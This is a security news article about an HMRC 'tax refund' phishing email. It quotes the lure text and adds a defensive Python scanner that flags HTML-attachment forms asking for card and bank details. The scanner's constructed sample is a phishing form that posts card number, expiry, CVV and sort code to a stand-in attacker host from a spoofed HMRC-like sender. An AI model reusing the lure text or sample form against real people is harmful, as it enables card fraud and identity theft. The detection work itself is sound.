Open an Attachment and Get a Tax Refund from HMRC, Phishing Scam

Never trust an email that requests complete credit card information

  HMRC phishing webpage
Emails that allegedly come from the UK tax organization HM Revenue and Customs (HMRC) are promising recipients a tax refund if they open an attachment and provide sensitive information. In reality, it’s nothing but a clever phishing scam.

Bearing the subject “Tax refund notification,” the email, as reported by Sophos’ Naked Security blog, reads:

Dear Taxpayer,

After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 223.56 GBP.

Please submit the tax refund request and allow us 6-9 days in order to process it.

To access your tax refund, please follow the steps below:
- download the Tax Refund Form attached to this email
- open it in a browser
- follow the instructions on your screen

A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.

The attached form asks for full name, date of birth, address, phone number, sort code, card number, card expiry date and security code. The card details alone are enough for fraudulent card-not-present payments, and combined with the personal data they are more than enough for identity fraud against the victim’s bank account.

To make everything more realistic, the crooks even put a note on the bottom of the phishing page, advising users to close the browser after the “refund process” is completed.

The attachment, which the email tells recipients to open in a browser (i.e. an HTML form rather than a link to a hosted page, which sidesteps URL-based filtering), was detected by Sophos security products as Mal/Phish-A, so up-to-date security software can block this kind of attack before the form is ever displayed.
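As an added example (not Sophos’ detection logic and not code from the original article), the following script shows the kind of heuristic a mail gateway or analyst can apply to this scam: parse an .eml, pull out any HTML attachment, and flag forms whose fields ask for payment-card or bank-account details. The sample message, the attachment filename, and the attacker host `refund-form.example` are constructed for this example.

```python
"""Heuristic scanner for HTML-attachment phishing forms.

Added example, not Sophos' detection logic. It parses an .eml message, pulls
out any HTML attachment, finds <form> elements and flags forms whose fields
ask for card or bank details. The sample message below is constructed.
"""
import email
import re
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Field kinds a tax authority has no reason to request via an emailed form.
SENSITIVE_PATTERNS = {
    "card_number": re.compile(r"card.?(no|num|number)|\bpan\b", re.I),
    "expiry": re.compile(r"exp(iry|ir|_?date)?\b|valid.?thru", re.I),
    "security_code": re.compile(r"cvv|cvc|cv2|security.?code", re.I),
    "sort_code": re.compile(r"sort.?code", re.I),
    "dob": re.compile(r"\bdob\b|birth", re.I),
}


class FormCollector(HTMLParser):
    """Collects every <form> with its action URL and the fields it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []          # list of {"action": str, "fields": [str, ...]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            # Scam forms usually reveal their purpose in name/id/placeholder.
            label = " ".join(attrs.get(k) or "" for k in ("name", "id", "placeholder"))
            self._current["fields"].append(label)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def classify_fields(fields):
    """Return the set of sensitive categories matched by a form's fields."""
    hits = set()
    for label in fields:
        for category, pattern in SENSITIVE_PATTERNS.items():
            if pattern.search(label):
                hits.add(category)
    return hits


def scan_html(html_text, min_categories=2):
    """Flag forms asking for at least `min_categories` kinds of card/bank data."""
    collector = FormCollector()
    collector.feed(html_text)
    findings = []
    for form in collector.forms:
        hits = classify_fields(form["fields"])
        if len(hits) >= min_categories:
            findings.append({"action": form["action"], "categories": sorted(hits)})
    return findings


def scan_eml(raw_bytes):
    """Scan every HTML attachment of an RFC 5322 message; return findings per part."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    results = []
    for part in msg.iter_attachments():
        if part.get_content_type() != "text/html":
            continue
        findings = scan_html(part.get_content())
        if findings:
            results.append({"filename": part.get_filename(), "forms": findings})
    return results


def build_sample_eml():
    """Constructed message mimicking the scam: an HTML 'Tax Refund Form'
    attachment whose form posts card details to a hypothetical attacker host."""
    html_form = """<html><body><h2>Tax Refund Request</h2>
    <form method="post" action="http://refund-form.example/submit.php">
      Full name <input name="fullname">
      Date of birth <input name="dob">
      Sort code <input name="sort_code">
      Card number <input name="card_number">
      Expiry <input name="exp_date">
      Security code <input name="cvv">
      <input type="submit" value="Submit refund request">
    </form>
    <p>Please close your browser after the refund process is completed.</p>
    </body></html>"""
    msg = EmailMessage()
    msg["From"] = "refunds@hmrc-notification.example"   # spoofed sender (constructed)
    msg["To"] = "taxpayer@example.org"
    msg["Subject"] = "Tax refund notification"
    msg.set_content("Please download the attached Tax Refund Form and open it in a browser.")
    msg.add_attachment(html_form, subtype="html", filename="Tax_Refund_Form.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for hit in scan_eml(build_sample_eml()):
        print(hit["filename"], "->", hit["forms"])
```

The threshold of two sensitive categories keeps ordinary newsletters with a single "date of birth" field from firing; a form that asks for card number, expiry and security code together is almost never legitimate in an attachment, and the external `action` URL is the address worth blocking and reporting.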

If you encounter such emails, ignore the requests they make and do not open the attachment. If you believe you are truly eligible for a tax refund, contact HMRC directly, using the contact details published on their official website.

Never use email addresses, phone numbers or links contained in suspicious messages: in most scenarios they are controlled by the scammers and set up to make everything look legitimate.
